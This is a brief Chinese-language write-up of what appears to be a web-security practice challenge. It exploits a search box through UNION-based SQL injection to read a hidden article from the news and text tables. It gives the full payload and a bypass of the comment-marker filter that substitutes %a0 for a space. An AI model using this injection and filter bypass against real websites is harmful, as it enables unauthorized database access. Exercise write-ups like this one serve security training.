搜索google可以看到目标文章。
搜索'可以看到报错,甚至能偷窥后端sql语句
也就是说,我们免去了查列数,查回显列的步骤。搜索
fuck%') union select news.*,text.text,autor FROM level7_news news, level7_texts text WHERE text.id = news.id and (text.title='Google: The browser is the computer') --
(注:1.直接搜索fuck无回显2.--后有空格)
发现-- 被过滤了(题目里也有说)
在bp里分别用+,%20(url中的空格)替换空格,都被过滤了。
搜了一下,这里可以用%a0替换空格(为啥啊555)
最终payload(注意用bp发)
search=fuck%') union select news.*,text.text,autor FROM level7_news news, level7_texts text WHERE text.id = news.id and (text.title='Google: The browser is the computer') --%a0&dosearch=search%21
